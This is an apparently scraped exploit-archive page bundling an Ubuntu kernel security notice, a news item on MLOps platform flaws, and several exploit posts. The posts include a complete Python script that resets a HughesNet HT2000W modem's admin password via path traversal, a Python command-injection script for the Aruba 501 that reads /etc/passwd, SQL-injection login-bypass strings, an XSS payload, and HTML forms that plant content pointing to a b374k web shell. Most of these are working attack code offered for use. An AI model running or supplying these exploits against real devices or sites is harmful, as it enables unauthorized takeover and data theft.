Ubuntu Security Notice 6972-3 - Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the Linux Kernel contained a race condition, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6972-3August 23, 2024linux-azure, linux-azure-4.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the LinuxKernel contained a race condition, leading to a NULL pointer dereference.An attacker could possibly use this to cause a denial of service (systemcrash). (CVE-2024-22099)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - User-Mode Linux (UML);   - GPU drivers;   - MMC subsystem;   - Network drivers;   - PHY drivers;   - Pin controllers subsystem;   - Xen hypervisor drivers;   - GFS2 file system;   - Core kernel;   - Bluetooth subsystem;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;   - ALSA SH drivers;(CVE-2024-26903, CVE-2024-35835, CVE-2023-52644, CVE-2024-39292,CVE-2024-36940, CVE-2024-26600, CVE-2023-52629, CVE-2024-35955,CVE-2023-52760, CVE-2023-52806, CVE-2024-39484, CVE-2024-26679,CVE-2024-26654, CVE-2024-36901, CVE-2024-26687, CVE-2023-52470)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-4.15.0-1180-azure   4.15.0-1180.195                                   Available with Ubuntu Pro   linux-image-azure-lts-18.04     4.15.0.1180.148                                   Available with Ubuntu ProUbuntu 16.04 LTS   linux-image-4.15.0-1180-azure   4.15.0-1180.195~16.04.1                                   Available with Ubuntu Pro   linux-image-azure               4.15.0.1180.195~16.04.1                                   Available with Ubuntu ProUbuntu 14.04 LTS   linux-image-4.15.0-1180-azure   4.15.0-1180.195~14.04.1                                   Available with Ubuntu Pro   linux-image-azure               4.15.0.1180.195~14.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6972-3   https://ubuntu.com/security/notices/USN-6972-2   https://ubuntu.com/security/notices/USN-6972-1   CVE-2023-52470, CVE-2023-52629, CVE-2023-52644, CVE-2023-52760,   CVE-2023-52806, CVE-2024-22099, CVE-2024-24860, CVE-2024-26600,   CVE-2024-26654, CVE-2024-26679, CVE-2024-26687, CVE-2024-26903,   CVE-2024-35835, CVE-2024-35955, CVE-2024-36901, CVE-2024-36940,   CVE-2024-39292, CVE-2024-39484

Ubuntu Security Notice USN-6972-3

HughesNet HT2000W Satellite Modem remote password reset exploit that leverages a path traversal vulnerability.

    # Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset# Date: 7/16/24# Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com># Vendor: HughesNet# Version: Arcadyan httpd 1.0# Tested on: Linux# CVE: CVE-2021-20090import sysimport requestsimport reimport base64import hashlibimport urllibred = "\033[0;41m"green = "\033[1;34;42m"reset = "\033[0m"def print_banner():    print(green + '''    _____________   _______________         _______________   ________  ____          _______________  _______  _______________        \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/_   |         \_____  \   _  \ \   _  \/   __   \   _  \       /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/ |   |  ______  /  ____/  /_\  \/  /_\  \____    /  /_\  \      \     \____\     /   |        \ /_____/ /       \  \_/   \/       \ |   | /_____/ /       \  \_/   \  \_/   \ /    /\  \_/   \      \______  / \___/   /_______  /         \_______ \_____  /\_______ \|___|         \_______ \_____  /\_____  //____/  \_____  /             \/                  \/                  \/     \/         \/                      \/     \/       \/               \/  \n''' + reset)    print("                           Administrator password reset for HughesNet HT2000W Satellite Modem")    print('''    Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address>    <password>:   The new administrator password    <ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n    This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset    the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as    improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''')    return Nonedef get_httoken(ip_address):    # Make a GET request to system_p.htm using path traversal    r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm')    if r.status_code != 200:        print(red + f"(-) Failure: Could not request system_p.htm" + reset)        exit()    # Extract the httoken hidden in the DOM and convert it from Base64    return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii')def encode_pass(password):    # Vigenere Cipher    key = "wg7005d"    enc_pass = ""    idx = 0    for c in password:        enc_pass += str(ord(c) + ord(key[idx])) + "+"        idx = (idx + 1) % len(key)    return enc_passdef change_pass(ip_address, httoken, enc_pass):    # Create a POST request with the httoken and the encoded password    headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'}    payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass}    payload = urllib.parse.urlencode(payload, safe=':+')    try:        r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers)    except:        pass    return Nonedef verify_pass(ip_address, new_pass):    # Make a GET request to cgi_sys_p.js to verify password    httoken = get_httoken(ip_address)    headers = {'Referer': f'http://{ip_address}/system_p.htm'}    r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers)    if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest():        print(red + "(-) Failure: Could not verify the hash of the password" + reset)        exit()def main():    if not (len(sys.argv) == 2 or len(sys.argv) == 3):        print_banner()        return    new_pass = sys.argv[1]    ip_address = "192.168.42.1"    if sys.argv == 3:        ip_address = sys.argv[2]    httoken = get_httoken(ip_address)    print(f"[+] Obtained httoken: {httoken}")    enc_pass = encode_pass(new_pass)    change_pass(ip_address, httoken, enc_pass)    print(f"[+] Password reset to: {new_pass}")    verify_pass(ip_address, new_pass)    print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest())    print("[+] Password successfully changed!")    returnif __name__ == '__main__':    main()

HughesNet HT2000W Satellite Modem Password Reset

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

**Human Resource Management System 2024 1.0 Cross Site Scripting**

Posted Aug 26, 2024

Authored by indoushka

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 25f4d7b7ca25178696d74bb308a9abcdd65caa3fc6c471e46b4b16febaa084ea

Download | Favorite | View

**Human Resource Management System 2024 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>[+] http://127.0.0.1/hrm/index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,543)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,875)
*   CGI (1,034)
*   Code Execution (7,834)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,116)
*   Encryption (2,389)
*   Exploit (53,289)
*   File Inclusion (4,263)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,239)
*   Local (14,807)
*   Magazine (587)
*   Overflow (13,177)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,646)
*   Remote (31,695)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,625)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,016)
*   Web (9,973)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,109)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,895)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,615)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,780)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Human Resource Management System 2024 1.0 Cross Site Scripting

Employee Record Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : ERMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = ' or 0=0 ## & pass = ' or 0=0 ##[+] http://127.0.0.1/erms/admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Employee Record Management System 1.0 SQL Injection

DETS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : DETS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/dets/add-expense.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

DETS Project 1.0 SQL Injection

Aruba 501 version CN12G5W0XX suffers from a remote command execution vulnerability.

    # Exploit Title: Remote Command Execution | Aurba 501# Date: 17-07-2024# Exploit Author: Hosein Vita# Vendor Homepage: https://www.hpe.com# Version: Aurba 501 CN12G5W0XX# Tested on: Linuximport requestsfrom requests.auth import HTTPBasicAuthdef get_input(prompt, default_value):    user_input = input(prompt)    return user_input if user_input else default_valuebase_url = input("Enter the base URL: ")if not base_url:    print("Base URL is required.")    exit(1)username = get_input("Enter the username (default: admin): ", "admin")password = get_input("Enter the password (default: admin): ", "admin")login_url = f"{base_url}/login.cgi"login_payload = {    "username": username,    "password": password,    "login": "Login"}login_headers = {    "Accept-Encoding": "gzip, deflate, br",    "Content-Type": "application/x-www-form-urlencoded",    "Origin": base_url,    "Connection": "close"}session = requests.Session()requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)# Login to the systemresponse = session.post(login_url, headers=login_headers, data=login_payload, verify=False)# Check if login was successfulif response.status_code == 200 and "login failed" not in response.text.lower():    print("Login successful!")        # The command to be executed on the device    command = "cat /etc/passwd"            ping_ip = f"4.2.2.4||{command}"        # Data to be sent in the POST request    data = {        "ping_ip": ping_ip,        "ping_timeout": "1",        "textareai": "",        "ping_start": "Ping"    }        # Headers to be sent with the request    headers = {        "Accept-Encoding": "gzip, deflate, br",        "Content-Type": "application/x-www-form-urlencoded",        "Origin": base_url,        "Referer": f"{base_url}/admin.cgi?action=ping",        "Connection": "close"    }        # Sending the HTTP POST request to exploit the vulnerability    exploit_url = f"{base_url}/admin.cgi?action=ping"    response = session.post(exploit_url, headers=headers, data=data, verify=False)            if any("root" in value for value in response.headers.values()):        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")        print(response.headers)    else:        print("Exploit failed. The response headers did not contain the expected output.")else:    print("Login failed. Please check the credentials and try again.")# Print the response headers for further analysisprint(response.headers)

Aruba 501 CN12G5W0XX Remote Command Execution

Bang Resto version 1.0 suffers from an information disclosure vulnerability.

====================================================================================================================================  
| # Title     : Bang Resto 1.0 HTML Form in redirect page Vulnerability                                                            |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   |  
| # Vendor    : https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip                                                |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/Bang/admin  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/Bang/admin  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Bang Resto 1.0 Information Disclosure

School Log Management System version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

School Log Management System 1.0 SQL Injection / Code Execution

Simple College Website version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about_us"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Simple College Website 1.0 SQL Injection / Code Execution

Cybersecurity researchers are warning about the security risks in the machine learning (ML) software supply chain following the discovery of more than 20 vulnerabilities that could be exploited to target MLOps platforms.
These vulnerabilities, which are described as inherent- and implementation-based flaws, could have severe consequences, ranging from arbitrary code execution to loading

Cybersecurity researchers are warning about the security risks in the machine learning (ML) software supply chain following the discovery of more than 20 vulnerabilities that could be exploited to target MLOps platforms.

These vulnerabilities, which are described as inherent- and implementation-based flaws, could have severe consequences, ranging from arbitrary code execution to loading malicious datasets.

MLOps platforms offer the ability to design and execute an ML model pipeline, with a model registry acting as a repository used to store and version-trained ML models. These models can then be embedded within an application or allow other clients to query them using an API (aka model-as-a-service).

"Inherent vulnerabilities are vulnerabilities that are caused by the underlying formats and processes used in the target technology," JFrog researchers said in a detailed report.

Some examples of inherent vulnerabilities include abusing ML models to run code of the attacker's choice by taking advantage of the fact that models support automatic code execution upon loading (e.g., Pickle model files).

This behavior also extends to certain dataset formats and libraries, which allow for automatic code execution, thereby potentially opening the door to malware attacks when simply loading a publicly-available dataset.

Another instance of inherent vulnerability concerns JupyterLab (formerly Jupyter Notebook), a web-based interactive computational environment that enables users to execute blocks (or cells) of code and view the corresponding results.

"An inherent issue that many do not know about, is the handling of HTML output when running code blocks in Jupyter," the researchers pointed out. "The output of your Python code may emit HTML and \[JavaScript\] which will be happily rendered by your browser."

The problem here is that the JavaScript result, when run, is not sandboxed from the parent web application and that the parent web application can automatically run arbitrary Python code.

In other words, an attacker could output a malicious JavaScript code such that it adds a new cell in the current JupyterLab notebook, injects Python code into it, and then executes it. This is particularly true in cases when exploiting a cross-site scripting (XSS) vulnerability.

To that end, JFrog said it identified an XSS flaw in MLFlow (CVE-2024-27132, CVSS score: 7.5) that stems from a lack of sufficient sanitization when running an untrusted recipe, resulting in client-side code execution in JupyterLab.

"One of our main takeaways from this research is that we need to treat all XSS vulnerabilities in ML libraries as potential arbitrary code execution, since data scientists may use these ML libraries with Jupyter Notebook," the researchers said.

